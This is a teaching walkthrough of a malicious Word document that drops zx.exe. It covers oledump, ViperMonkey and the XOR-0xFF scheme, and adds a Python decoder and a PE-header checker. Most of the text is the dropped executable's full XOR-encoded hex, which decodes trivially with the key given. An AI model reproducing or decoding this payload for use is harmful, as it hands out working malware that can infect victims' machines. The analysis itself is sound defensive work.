Malicious Office Document Analysis | Malware Club

Malware Club is starting up for the year, and part of the first meeting will be reviewing a malicious Office document. I thought it would be nice to post the walkthrough here as well, so that people can come back, review parts of it, and grab the commands used.

Since this is a malicious Office document, the first thing I'd recommend is renaming the .doc file to .bin, so that a stray double-click doesn't open it in Word and you can't accidentally execute it in any way. With Word files this usually isn't a problem, because the macros still have to be enabled before they run, but it's better to be safe than sorry.

From there, it's time to jump into REMnux, a Linux toolkit for malware analysis that can be found here. It ships with most of the tools I'll be using, but sometimes additions have to be made. One addition that isn't required but that I do recommend is ViperMonkey, a VBA emulator; in some situations it gives a good overview of what the malicious macros are trying to do without you having to read every line of them.

Once REMnux is all set up, it's time to jump into the terminal and use oledump:

This lists the streams inside the OLE file and flags which of them contain macros, and it lets me extract those macro streams to a text file like this:

Now you can open the streams in your favorite text editor. Feel free to set the syntax highlighting to whatever fits (Visual Basic, in this case); here I just used Sublime. Here are brief looks at the inside of both streams:

Stream 7 appears to hold some obfuscated data, and stream 8 looks like the code that decodes that data and executes it. Let's see what ViperMonkey has to say as well:

According to ViperMonkey, once the document is opened the macro writes an executable named "zx.exe" to disk and then runs it. That is a little unusual: most maldocs of this type are downloaders that call out to a C2 server or some compromised site to fetch the actual malware as soon as the macros are enabled, whereas this one carries the payload inside the document itself.

Going back to stream 7, it appears that the variable "ouffer" holds the obfuscated contents of that executable. It looks like hex byte values separated by ampersands (&) and then passed through a single-byte XOR cipher. At the bottom of the stream is the function used to deobfuscate the variable's contents:

When I notice a VBA function I don't recognize, I usually jump over to the Microsoft documentation to see what it does and how it works. For example, click here to check out the "LBound" function, which returns the lowest index of an array (here, the array produced by splitting ouffer). From this code excerpt, it looks like the function splits ouffer at the ampersands and then XORs each value with 0xFF. Just XORing the first two bytes, 0xB2 and 0xA5, with 0xFF gives 0x4D and 0x5A. Those are the ASCII characters "M" and "Z", which tells us the obfuscated data is the contents of an MZ (PE) executable.

To deobfuscate it, I kind of took the lazy way out. I copy-pasted the code into an online tool, which can be found here, and told it to remove the ampersands, the variable declarations, the equals signs, and so on, until only the hex was left. From there I ran over to repl.it and wrote a little Python to do the XORing, because I need all the practice I can get. Here is the code:

needXOR = "B2 A5 6F FF FC FF FF FF FB FF FF FF 00 00 FF FF 47 FF FF FF FF FF FF FF BF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 1F FF FF FF F1 E0 45 F1 FF 4B F6 32 DE 47 FE B3 32 DE AB 97 96 8C DF 8F 8D 90 98 8D 9E 92 DF 9C 9E 91 91 90 8B DF 9D 9A DF 8D 8A 91 DF 96 91 DF BB B0 AC DF 92 90 9B 9A D1 F2 F2 F5 DB FF FF FF FF FF FF FF 83 5C DE 4C C7 3D B0 1F C7 3D B0 1F C7 3D B0 1F A8 4B 2E 1F C5 3D B0 1F A8 4B 1A 1F C1 3D B0 1F CE 45 23 1F CE 3D B0 1F C7 3D B1 1F D9 3D B0 1F A8 4B 1F 1F C5 3D B0 1F A8 4B 2D 1F C6 3D B0 1F AD 96 9C 97 C7 3D B0 1F FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF AF BA FF FF B3 FE FC FF 5E D1 3D A1 FF FF FF FF FF FF FF FF 1F FF FD FE F4 FE F5 FF FF EF FF FF FF EF FF FF FF 8F FF FF 0F 77 FF FF FF 7F FF FF FF 6F FF FF FF FF BF FF FF EF FF FF FF FD FF FF FA FF FE FF FF FF FF FF FA FF FE FF FF FF FF FF FF 5F FF FF FF EF FF FF FF FF FF FF FD FF BF 7A FF FF EF FF FF EF FF FF FF FF EF FF FF EF FF FF FF FF FF FF EF FF FF FF FF FF FF FF FF FF FF FF 47 6E FF FF AB FE FF FF FF 6F FF FF 47 FE FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF F3 6C FF FF F3 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF AA AF A7 CF FF FF FF FF FF 8F FF FF FF EF FF FF FF FF FF FF FF FB FF FF FF FF FF FF FF FF FF FF FF FF FF FF 7F FF FF 1F AA AF A7 CE FF FF FF FF FF EF FF FF FF 7F FF FF FF F3 FF FF FF FB FF FF FF FF FF FF FF FF FF FF FF FF FF FF BF FF FF 1F D1 8D 8C 8D 9C FF FF FF FF EF FF FF FF 6F FF FF FF FB FF FF FF EF FF FF FF FF FF FF FF FF FF FF FF FF FF FF BF FF FF 3F FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF CC D1 C6 CE FF AA AF A7 DE F2 F6 FD F6 23 7B CA 93 30 1B 8A 76 8A 9B FF FF 1B F7 FF FF FF E3 FF FF D9 FF FF 07 02 00 24 00 AA 74 13 7E 13 CF F5 FF FF 5E FD DF FF CC 3A 76 BA 03 AC A9 A8 CC 3F 97 F9 FD 82 14 01 40 EF AF 72 72 1D 07 00 00 AE 99 76 7A 1F F8 17 EE F9 13 CC 2D DE D0 34 70 E5 AD 72 7A 25 09 AF 6A 27 09 0D 4D 03 37 36 AE 72 6A 0D 03 AD 72 0F 03 6F D8 D8 E4 AF 15 05 17 05 21 69 A4 84 97 FC FE F9 CD 06 01 95 A9 39 7A 07 48 90 E0 14 F7 FF E6 7C 3B C3 97 F8 FB 0F 00 EA D8 EF E7 33 92 53 D3 7F F5 EB 84 2F 0A E0 04 30 39 F3 FF F9 8F 74 27 74 B4 FB AE F4 C7 74 07 A8 88 00 00 27 95 BF F5 BF 74 0F 7A 09 8A EC A0 A1 A4 74 B2 03 CC 32 A9 FB 0E 74 11 38 91 12 1A A2 3D C9 DE FF A9 9A 74 AC FB 74 E2 D5 D2 29 02 22 87 AD 93 EF 6F A9 00 2C 97 F7 55 72 5E DB 12 88 49 6E AF A8 47 17 CD FB F3 67 F8 C6 27 27 CF A9 A1 A7 43 2A 0A 2B 0A 98 4E 08 DA F3 97 FB E3 EC 5B DB 06 C4 27 08 7A 3F 8B F1 9A 6B B1 14 F3 F2 5B 72 6A 30 E3 93 13 AD DC B7 CA 1F 07 E2 C9 68 11 4E 4B E9 A3 74 C2 C8 FB 27 09 95 FF A4 08 8C 86 2F 1F 07 28 74 
CA F1 AB 95 27 24 35 F1 60 09 29 72 87 DA E0 0F D3 A7 94 6E 03 E7 FE B6 85 21 68 4E E9 F0 5F 7F F0 7A 42 FF 80 22 4D 64 3A D5 AE 30 FD 03 FB E3 7B 4F 58 64 62 5F C5 98 6A AD 53 6A F0 F8 88 74 35 B2 42 B8 27 AD 27 A6 FB 48 CD EB 98 2F 00 B3 58 89 DE 3D 27 D7 35 D3 8B 1F 47 F4 F9 2F 2F A5 4D 4E 5C CA DC 15 A7 7B 3C 64 FC B3 A9 B0 9B C4 1E 9F D2 D7 9E EE F7 13 87 9A 7C B2 61 99 E7 6A AD 33 E3 D3 EB F3 98 8B CF 06 00 04 A4 11 B7 C9 DF 03 33 FF 00 7C 13 F3 80 94 22 C4 F3 95 DF 95 FC FA FE A5 FF 7F AF 38 BA 0B FF 8E A4 39 CF B1 CB 7C A4 8A F8 9A 73 92 48 3C A0 C2 3C AC DA A8 8D F7 5A 3C C1 08 7A 24 8B D1 CB FE FD E9 BB BD 49 4C 3E 45 07 3C E9 E8 FB 7A F3 EA 03 F8 39 3E A1 8A F7 A4 BA A9 AC 5E 8B 9F 4B E0 39 B0 AC 71 AC 74 A2 03 E3 99 DC D3 9C 11 E7 AC C9 3A EF 07 CE AF 08 39 41 92 09 2C 97 2C 74 AA F7 4C FD 85 4C E4 89 C4 13 BF AD 53 7A 54 F6 A1 98 03 88 49 CA 7C E2 32 C9 A9 61 DF C3 9D 11 E9 F3 43 DB 47 FE C6 D8 01 20 65 EF F0 F7 FD CC 09 A8 74 82 F7 76 8A 07 14 FC 40 44 E0 10 F8 F0 49 FB C1 73 DF F7 67 FA E3 46 F6 D5 3E DC 9C 12 12 77 BA 01 E7 BB C1 FE A4 EA 45 3D 10 7E 02 D3 00 FD AF AD D4 75 27 D5 00 9F A4 6F FC AD 07 D2 75 AA 00 75 37 75 3C 24 90 20 01 77 B2 02 3F 1F F9 F5 D9 B2 01 FD 36 FE 3F 15 FB F5 2E 45 F3 22 90 40 0F 77 EB F0 B8 FA DF 7C 39 FB 76 CE 7F 04 BF 8B ED D0 3F 90 40 09 09 14 FD 3F 1D E0 25 77 E3 E3 E9 82 02 E8 F8 77 FB 56 4F 02 9C F3 C4 8A EF F0 73 B4 00 FF 74 7B 0B 02 BD 3D 21 26 FF E9 3D FB FF C4 F2 80 9F 22 80 13 8A FD 0C 3C 16 72 25 E0 72 BD 00 A4 3C 7A 48 09 1E 72 5B DB 02 72 9B F9 D0 75 BB DB F0 44 48 7A F4 15 3E 1F 10 AB F6 08 3D FC E6 8B EA F4 C0 04 00 75 F5 7C 3D FE C5 34 8B 30 7B 36 8B AE EB 8A 14 F4 27 CB 3C 02 00 00 09 3E 1C EF A9 F7 74 F5 40 00 01 01 81 74 3E 74 08 CC 34 FC 0F FC 06 7C 0E 00 7C 81 00 48 90 36 CC 30 CC 39 C7 FB 7E 1E FF FE FE 7E 8A E3 DA F9 8B 2C 79 80 23 87 FE E4 7E 19 84 8A 3B A1 A0 42 00 90 03 F4 46 BD 03 C5 3C 8B C9 7B B5 10 C5 1C 8B D8 7B 1B 8B 18 3E 17 12 59 96 45 EF ED EA 23 F9 2B 14 69 D2 8C 2D 46 98 4C BD 01 C8 
F9 02 03 82 14 B9 1F 74 00 20 D7 61 5C FD DE A7 76 F2 23 23 23 23 FA AB 76 EA AF 76 E2 B3 76 CA B7 76 C2 D4 32 09 22 BB 99 73 E7 8F F9 F2 9B DF 5A A6 65 12 BF EB FA C3 DA C7 72 EA 61 64 D2 CB 63 70 97 9B A9 A3 4D 0B 06 4C F8 FB 9F 72 BA F7 93 74 54 03 11 92 72 22 38 DC DF 57 9E FE 5E E3 E6 9C 93 1E 27 DF A3 EC AF F6 7D 3F F6 AB 80 60 94 72 3E 86 76 96 CD F5 FB CB E9 3C D3 23 5D CB 5F A0 7C 0B 56 6B E6 1F A6 28 E7 A0 77 3C E9 21 9C F5 9B 7C C2 DF 85 F7 DC 23 C2 DE 42 97 A4 01 36 3C 7C 45 DC 87 FF 0F 29 E4 9D F6 3C F3 74 B3 DB 34 2D 8B 96 48 F9 A0 67 24 B2 8A E9 7E 05 A4 B1 8D F1 F5 C4 E9 C1 DC 8B 21 FA E8 F8 99 33 3D 00 00 E8 4A 05 FB 8D CE 08 26 7C 1E FC 8B F3 D4 2E 77 F8 7C 38 FE 7C 16 55 12 19 24 0E 09 74 37 F0 FC 3E F9 EF 35 7C 1D FA 62 4C 11 3D 16 FD 6D 0C 54 A7 F5 D8 15 0A 72 40 24 9F A0 3C FA FB 3C 99 F0 10 3F AE B7 3E 7C 1F F0 9F 43 4F 22 F7 80 74 3D CC 80 2F F8 8B C8 92 18 06 89 48 E0 80 FE FC BE EF FB DF CF 04 04 86 61 BF AF 9F 8F 72 76 55 B7 8A 2F 97 4E B4 90 52 C8 BB BE FB 8B F0 5C 72 B6 C0 12 52 CA 97 F9 C0 8B A7 F0 8B E3 E5 B5 48 5A 09 CC 24 3E 15 6D 3C E6 EA FB B5 37 80 84 04 29 88 3C F9 77 E6 BE DF 05 A4 A7 6D 27 08 24 7C 3C EF 68 C4 08 3D D4 2C FB AD 74 2C 41 E4 FE BE B5 3E 14 0F 3C 2D 83 CC FE B4 A5 F8 8A 95 F5 7F 8A E3 71 B6 97 5C E3 66 FF FF AE 5C FB EE E9 7A 01 AD 00 D1 DA 88 8C FF D0 8A FF D1 FF 9B FF 9E 77 AF BD 45 E8 96 F0 CD 0E 11 72 41 31 AA FF AC FF 84 AD FF AF FC B0 FF B9 FF 20 83 28 92 02 B3 F0 DA AA AB FF 92 FF 8F 9C 92 9B DF D0 40 04 64 00 9C DF 9A 87 8F 9E 91 9B DF DF D2 B9 C5 D5 DF DD F6 DD DF D9 D9 DF 9B 48 13 92 24 9A 93 E0 99 FD 8E E4 D0 E0 DD FF 74 00 A3 85 87 D1 9D 9E 8B DD 1A FA BB E9 F6 AB 00 00 00 E0 B1 19 BF 44 4E E6 40 BB CD AF 97 BC DE B7 A5 9A 8A C8 8E 85 A9 C6 88 AE AA 9D 93 00 00 00 00 BB 99 BD 9E 94 8F 86 8D 90 CA 89 B2 A8 98 BE A7 8C CE AB D2 CB B8 B6 C2 CC B5 87 AC 95 B3 AD 92 FE 6E 03 00 B1 C7 B0 CF B9 8B 9B 91 9C C9 96 BA B4 A6 7F 7B 37 B9 FF 3F 1D AA AB F7 DB 0C 6B 3A D5 D5 0E 57 6D AA EE AE FE 49 5D EF 00 40 C3 
E8 67 EF FE B8 9A 8B BC 90 92 92 9E 91 9B B3 96 FA 04 80 1B 91 9A A8 AB 9A 92 8F B9 96 93 9A B1 9E 92 EE 24 04 20 01 F2 AC 96 85 9A F3 B2 9E 8F A9 96 9A 88 B0 99 ED F1 AA 13 40 A2 27 91 92 EF AC D3 BA 8D 8D 90 8D B2 90 9B F2 08 80 8C 24 DE 97 A3 E5 9B BA 87 9C 9A 8F 8B 96 90 91 D7 A4 04 89 89 8B 9A 8D 85 8A D4 9A 91 8B AF CF E4 8C 44 64 4A 48 8C ED A8 8D 96 E5 B7 E2 AC 86 8C F2 8C 48 24 80 92 A8 90 88 C9 CB BB 96 D8 9C 8B A9 86 BE AB E1 24 12 36 A5 B7 69 BE 8B 8B CB 9D 8A D7 8C 36 25 89 8C 55 46 8D 92 39 9E F3 AE 24 29 32 49 BC C8 9E AD E1 93 B0 8D F7 91 20 49 26 98 2C B3 9E 8C 55 F2 B3 D3 9E 93 BE 93 24 45 7E 4A 93 F9 CF 15 8F B3 98 C8 21 29 65 F8 9C 9E 8B A8 EF 38 9A D9 B6 41 3A 21 D3 8C 9A B7 26 9B BB 9A 93 9A F4 5D 94 9C B3 B9 BA E8 BA 79 32 8A A4 04 BA 91 89 42 09 92 17 AC 54 AE 94 12 29 81 56 B6 8C CB 4A 98 98 4F 55 57 92 7A 2F A3 E5 ED D6 D3 A7 14 49 9F 30 53 B9 62 8A CE CB DF 63 99 DE 37 5A 8F 3A 01 CB 24 C0 AB 90 BE 8D 98 89 A8 E3 4E 7F AA AD B3 BB 8B 50 22 E9 B9 91 4C 9E 9B E3 58 E3 43 A7 9E 08 2C 87 88 8C 8F 6A 8B 99 A5 FF 34 00 00 00 F1 69 F9 F4 F2 F8 F3 F4 D4 F9 D1 D0 F6 F1 F2 EE F9 F9 F1 F0 E8 D3 B5 EA F9 C4 C3 00 00 00 F8 ED F7 F8 BE E7 E8 E9 E6 D8 F6 E0 DE F5 CB F5 E9 E9 E7 82 0F 0C FF F9 F8 89 04 40 63 F7 F3 F6 FA F9 F5 F6 F4 F3 FA EF F8 F9 E9 EE 00 AD 00 00 D5 0F E7 FE FA 0F A4 F7 FB 0F 8B E0 FF AF BA 8C B3 FE F9 FF 5E D1 3D 89 49 00 6F A1 1F FF FD FE F4 FE F5 80 F5 EB 62 82 7C F2 EF FC DF F3 BF F4 FD 45 C8 74 43 E1 FA FF FE F8 02 E1 FB 34 21 04 A3 0A DE BF 7A D7 FD F8 30 0D 4D 85 F9 F3 E3 DE 9B AF 9B E6 BF D1 4B FE 9F 37 F0 9B 22 7F 58 77 E1 D1 8B 9A 9A A0 4F 32 87 8B CB F7 6F 14 FB BD 20 26 E9 C1 9F D1 8D 9B 1E 9E E4 A7 04 F9 53 C6 93 F6 EC FD BF D1 D9 5B 96 65 A4 D8 83 FC CF FD EB 98 6C 10 58 3F D1  BC AD AB EF FB D8 E9 26 CA F1 9F B0 8D 8C 1C D8 4B FE 16 FF E6 5B AF E7 9A D8 B5 F9 06 25 BD D8 9F E5 47 6E 24 90 BD E4 F7 DD ED E4 9D 85 F9 FF FF FF FF FF FF ED FF 00 FF FF FF FF FF FF FF FF FF FF FF FF 9F 41 FF 7F BF FF 72 41 FF 6F 00 00 A8 14 F4 
6F 75 F9 B9 77 F8 B8 FE 24 8A F8 74 E1 7C 11 03 EE 24 8D 12 47 FE FF FF FF FE 24 8A F8 74 E1 7C 11 03 EE 24 EE 3F FE 24 8C 10 8A F6 74 E1 7C 11 03 EE 24 8C 1B CE 36 7C 17 FC 8D F2 3E 1F F7 75 F9 B9 7C 0F 00 8B 8B 76 3A FE 24 8A F8 74 E1 7C 11 03 EE 24 EE 36 FE 24 8A F8 74 E1 7C 11 03 EE 24 EE 36 8A DF BE FE 24 8A F8 74 E1 7C 11 03 EE 24 EE 36 FE 24 8C 10 8A F6 74 E1 7C 11 03 EE 24 8C 1B 7C 3E FD 7E 02 FF 0C 00 00 7C 2E FE 72 EB D0 7C 02 03 89 F0 75 FD BD 77 F8 B8 B6 8A 08 16 9C 00 00 00 6F 74 FD 7C 3D FB 76 F8 7C 38 FB 7C 16 FB 88 0E FE 30 16 B3 00 00 00 A1 76 08 46 E7 FF FF FF 75 F8 B8 D3 17 C3 FE 88 08 7F C0 FF 8A 0D 74 F8 75 A0 FB 99 3E 17 F7 3E 3F EF 79 3B D6 07 7F 14 17 FE 0F 76 F8 7C 38 FA 77 27 1D 26 72 41 FF 9F FF FF 74 F8 F6 3F 8B C3 74 A0 FB 72 7B CF 47 7E FF FF FE 0C AF 7C 38 F7 00 69 E3 7D FF FF 6A 75 F8 B8 F7 3F 8B 23 76 06 A8 B7 0D 51 AA 00 69 DF 7D FF FF F6 3F 8B F8 76 FC 7C 3C FB 14 1E 00 69 CF 7D FF FF 7C 38 FB 72 A1 03 CE 3F 75 F8 B8 F6 3F 8B DD C3 10 88 EE FE 3C 74 FC 79 3B 3E 3F EF 79 3B FE 0F 76 FC 14 1D DB F0 3E 1F EF 99 74 F8 7C 38 FD 14 1D 74 51 DB 7D FF FF 72 41 FF 0F 00 00 44 FF EF FF FF AF AB 95 FB AC A8 00 2A 72 78 00 FE FF FF 7F DF 80 7F 9F D7 80 A7 AF AB AF AC A8 00 2A A7 9E 72 BB DB 7F 95 FF C6 3B 8A 05 7C 13 7F 16 A8 7A 00 00 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 
FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FB FF FF FF FF FF FE FF E7 FF FF FF E7 FF FF 7F FF FF FF FF FF FF FF FF FB FF FF FF FF FF FE FF FE FF FF FF CF FF FF 7F FF FF FF FF FF FF FF FF FB FF FF FF FF FF FE FF F6 FB FF FF B7 FF FF FF A3 6F FF FF A5 FE FF FF 1B FB FF FF FF FF FF FF A7 AF FF FF C3 9E 8C 8C 9A 92 9D 93 86 DF 87 92 93 91 8C C2 DD 8A 8D 91 C5 8C 9C 97 9A 92 9E 8C D2 92 96 9C 8D 90 8C 90 99 8B D2 9C 90 92 C5 9E 8C 92 D1 89 CE DD DF 92 9E 91 96 99 9A 8C 8B A9 9A 8D 8C 96 90 91 C2 DD CE D1 CF DD C1 F2 F5 DF DF C3 8B 8D 8A 8C 8B B6 91 99 90 DF 87 92 93 91 8C C2 DD 8A 8D 91 C5 8C 9C 97 9A 92 9E 8C D2 92 96 9C 8D 90 8C 90 99 8B D2 9C 90 92 C5 9E 8C 92 D1 89 CC DD C1 F2 F5 DF DF DF DF C3 8C 9A 9C 8A 8D 96 8B 86 C1 F2 F5 DF DF DF DF DF DF C3 8D 9A 8E 8A 9A 8C 8B 9A 9B AF 8D 96 89 96 93 9A 98 9A 8C C1 F2 F5 DF DF DF DF DF DF DF DF C3 8D 9A 8E 8A 9A 8C 8B 9A 9B BA 87 9A 9C 8A 8B 96 90 91 B3 9A 89 9A 93 DF 93 9A 89 9A 93 C2 DD 9E 8C B6 91 89 90 94 9A 8D DD DF 8A 96 BE 9C 9C 9A 8C 8C C2 DD 99 9E 93 8C 9A DD C1 C3 D0 8D 9A 8E 8A 9A 8C 8B 9A 9B BA 87 9A 9C 8A 8B 96 90 91 B3 9A 89 9A 93 C1 F2 F5 DF DF DF DF DF DF C3 D0 8D 9A 8E 8A 9A 8C 8B 9A 9B AF 8D 96 89 96 93 9A 98 9A 8C C1 F2 F5 DF DF DF DF C3 D0 8C 9A 9C 8A 8D 96 8B 86 C1 F2 F5 DF DF C3 D0 8B 8D 8A 8C 8B B6 91 99 90 C1 F2 F5 C3 D0 9E 8C 8C 9A 92 9D 93 86 C1 AF BE FF FF FF FF FF FF FF FF FF FF FF FF AF 6D FF FF E3 6D FF FF FF FF FF FF FF FF FF FF FF FF FF FF A2 6D FF FF C7 6D FF FF FF FF FF FF FF FF FF FF FF FF FF FF 96 6D FF FF BF 6D FF FF FF FF FF FF FF FF FF FF FF FF FF FF 8B 6D FF FF B7 6D FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 81 6D FF FF 73 6D FF FF 63 6D FF FF 53 6D FF FF 45 6D FF FF 37 6D FF 
FF FF FF FF FF 29 6D FF FF FF FF FF FF 15 6D FF FF FF FF FF FF 01 6D FF FF FF FF FF FF B4 BA AD B1 BA B3 CC CD D1 BB B3 B3 FF AC B7 BA B3 B3 CC CD D1 9B 93 93 FF 8A 8D 93 92 90 91 D1 9B 93 93 FF AA AC BA AD CC CD D1 9B 93 93 FF FF B3 90 9E 9B B3 96 9D 8D 9E 8D 86 BE FF FF B8 9A 8B AF 8D 90 9C BE 9B 9B 8D 9A 8C 8C FF FF A9 96 8D 8B 8A 9E 93 AF 8D 90 8B 9A 9C 8B FF FF A9 96 8D 8B 8A 9E 93 BE 93 93 90 9C FF FF A9 96 8D 8B 8A 9E 93 B9 8D 9A 9A FF FF FF BA 87 96 8B AF 8D 90 9C 9A 8C 8C FF FF FF BC 90 92 92 9E 91 9B B3 96 91 9A AB 90 BE 8D 98 89 A8 FF FF AA AD B3 BB 90 88 91 93 90 9E 9B AB 90 B9 96 93 9A A8 FF FF 88 8C 8F 8D 96 91 8B 99 BE FF FF FF FF 7F FF FF F3 FF FF FF 0D C7 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF"

# The needXOR string above is one long line in the original; if it wrapped
# when you copied it, rejoin it or turn it into a triple-quoted string.
# split() is used below so extra spaces (there is a double space in the
# data) or newlines don't produce bogus bytes.
key = 0xFF
decoded = [int(token, 16) ^ key for token in needXOR.split()]

# Two-digit hex per byte, so values below 0x10 don't come out as e.g. "0xb";
# CyberChef's "From Hex" with the delimiter set to Auto reads this directly.
endval = " ".join("{:02x}".format(b) for b in decoded)

print(endval)

And here it is actually working on a smaller sample:

I then took the output of my code and plugged it into CyberChef using the "From Hex" operation with the delimiter set to "Auto". I received this output:

From this output I can see that the obfuscated data was indeed an MZ executable, and I now have its raw contents. This is where I'll stop this post, but from this point the bytes can be saved to a file and studied statically in a program like Ghidra or IDA Pro. Keep it on the analysis VM and don't run it: it's the same zx.exe the macro drops.
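As an added example (this is not the post's own code, nor the VBA from the sample), here is the stream-7 decoding routine described above reimplemented in Python, so the ampersand-splitting step doesn't need an online tool, plus the header check a practitioner would run before pulling the result into Ghidra or IDA: confirm "MZ" at offset 0, read e_lfanew at 0x3C, and confirm "PE\0\0" there. The exact input format (two-hex-digit values joined by "&", with an optional VBA-style "&H" prefix tolerated), the function names, and the sample bytes are assumptions or constructed data; the real zx.exe is not reproduced here. The key-recovery helper generalizes the manual check from the post (XOR the first bytes until they spell "MZ") to all 256 single-byte keys.

```python
import struct

XOR_KEY = 0xFF  # single-byte key recovered from the VBA routine in stream 7


def decode_ouffer(ouffer: str, key: int = XOR_KEY) -> bytes:
    """Reverse the stream-7 encoding: split on '&', read each piece as a hex
    byte and XOR it with the key. A leading 'H' (VBA's &H hex-literal prefix)
    is tolerated and empty pieces from a leading/trailing '&' are skipped.
    Assumption: the post only says the string is split at '&'."""
    out = bytearray()
    for piece in ouffer.split("&"):
        piece = piece.strip()
        if not piece:
            continue
        if piece[0] in "Hh":
            piece = piece[1:]
        out.append(int(piece, 16) ^ key)
    return bytes(out)


def recover_key(ouffer: str) -> list:
    """Return every single-byte key under which the first two decoded bytes
    spell 'MZ'. This is the check the post does by hand for 0xFF, run for
    all 256 candidates; for a PE payload exactly one key survives."""
    first_two = decode_ouffer(ouffer, 0)[:2]
    return [k for k in range(256) if bytes(b ^ k for b in first_two) == b"MZ"]


def check_pe(data: bytes) -> dict:
    """Sanity-check that decoded bytes look like a PE image: 'MZ' at 0,
    e_lfanew (DWORD at 0x3C) inside the buffer, and 'PE\\0\\0' at e_lfanew."""
    result = {"mz": False, "e_lfanew": None, "pe": False}
    if len(data) < 0x40 or data[:2] != b"MZ":
        return result
    result["mz"] = True
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    result["e_lfanew"] = e_lfanew
    result["pe"] = data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"
    return result


def carve(data: bytes, path: str) -> int:
    """Write the decoded bytes to disk for static analysis. Never execute it."""
    with open(path, "wb") as f:
        return f.write(data)


# --- constructed sample, NOT the real zx.exe ---
# 64-byte DOS header whose e_lfanew points at 0x40, then a PE signature and
# an x86 Machine field; enough for the header checks above to pass.
SAMPLE_PLAIN = (b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40)
                + b"PE\x00\x00" + b"\x4c\x01")
# Encode it the way stream 7 does: XOR every byte with 0xFF, hex, join on '&'.
# The first two pieces come out as B2 and A5, matching the post.
SAMPLE_OUFFER = "&".join("{:02X}".format(b ^ XOR_KEY) for b in SAMPLE_PLAIN)


if __name__ == "__main__":
    print("candidate keys:", [hex(k) for k in recover_key(SAMPLE_OUFFER)])
    exe = decode_ouffer(SAMPLE_OUFFER)
    print(check_pe(exe))
    carve(exe, "zx_decoded.bin")  # open this in Ghidra/IDA; do not run it
```

On the real sample you would paste the value of ouffer from stream 7 in place of SAMPLE_OUFFER; if check_pe reports "mz" but not "pe", the split or the key is wrong (or the data was truncated), which is worth knowing before spending time in a disassembler.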

